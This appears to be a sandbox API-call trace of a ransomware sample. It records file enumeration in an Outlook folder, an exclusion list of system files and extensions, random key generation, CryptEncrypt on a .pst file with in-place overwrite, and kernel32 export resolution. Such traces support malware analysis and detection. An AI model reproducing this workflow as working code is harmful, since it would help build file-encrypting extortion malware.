[0084.249] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.249] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0084.249] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.249] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0084.249] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\jkbimi8.tmp" [0084.249] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.249] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.249] CloseHandle (hObject=0x0) returned 0 [0084.249] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.249] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0084.249] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="DECRYPT-FILES.txt") returned 1 [0084.249] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="autorun.inf") returned 1 [0084.249] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="boot.ini") returned 1 [0084.249] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="desktop.ini") returned 1 [0084.249] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="ntuser.dat") returned 1 [0084.249] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="iconcache.db") returned 1 [0084.250] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="bootsect.bak") returned 1 [0084.250] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="ntuser.dat.log") returned 1 [0084.250] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="thumbs.db") returned 1 [0084.250] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="Bootfont.bin") returned 1 [0084.250] lstrlenW (lpString="voeimd@djhreuu.uhd.pst") returned 22 [0084.250] lstrcmpiW (lpString1="pst", lpString2="lnk") returned 1 [0084.250] lstrcmpiW (lpString1="pst", lpString2="exe") returned 1 [0084.250] lstrcmpiW (lpString1="pst", lpString2="sys") returned -1 [0084.250] lstrcmpiW (lpString1="pst", lpString2="dll") returned 1 [0084.250] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 54 [0084.250] lstrlenW (lpString="voeimd@djhreuu.uhd.pst") returned 22 [0084.250] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0084.250] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="voeimd@djhreuu.uhd.pst" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" [0084.250] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.250] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=271360) returned 1 [0084.250] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.250] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x12a0000 [0084.251] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.251] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.251] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.253] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.253] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.262] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.263] UnmapViewOfFile (lpBaseAddress=0x12a0000) returned 1 [0084.265] CloseHandle (hObject=0x42c) returned 1 [0084.265] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.265] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.287] CloseHandle (hObject=0x0) returned 0 [0084.287] CloseHandle (hObject=0x428) returned 1 [0084.287] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.287] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.287] GetTickCount () returned 0x114d894 [0084.287] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.288] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.288] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.288] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.288] lstrlenA (lpString="kernel32.dll") returned 12 [0084.288] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.288] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.288] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.289] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.289] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.289] lstrlenA (lpString="ADDATOMA") returned 8 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.289] lstrlenA (lpString="ADDATOMW") returned 8 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.289] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.289] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.289] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.289] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.289] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.289] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.289] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.289] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.289] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.289] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.289] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.289] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.289] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.289] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.289] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.290] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.290] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.290] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.290] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.290] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.290] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.290] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.290] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.290] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.290] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.290] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.290] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.290] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.290] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.290] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.290] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.290] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.290] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.290] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.291] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.291] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.291] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.291] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.291] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.291] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.291] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.291] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.291] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.291] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.291] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.291] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.291] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.291] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.291] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.291] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.291] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.291] lstrlenA (lpString="BEEP") returned 4 [0084.291] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.292] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.292] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.292] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.292] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.292] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.292] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.292] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.292] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.292] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.292] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.292] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.292] lstrlenA (lpString="CANCELIO") returned 8 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.292] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.292] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.292] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.292] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.292] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.292] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.292] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.293] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.293] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.293] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.293] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.293] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.293] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.293] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.293] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.293] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.293] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.293] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.293] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") 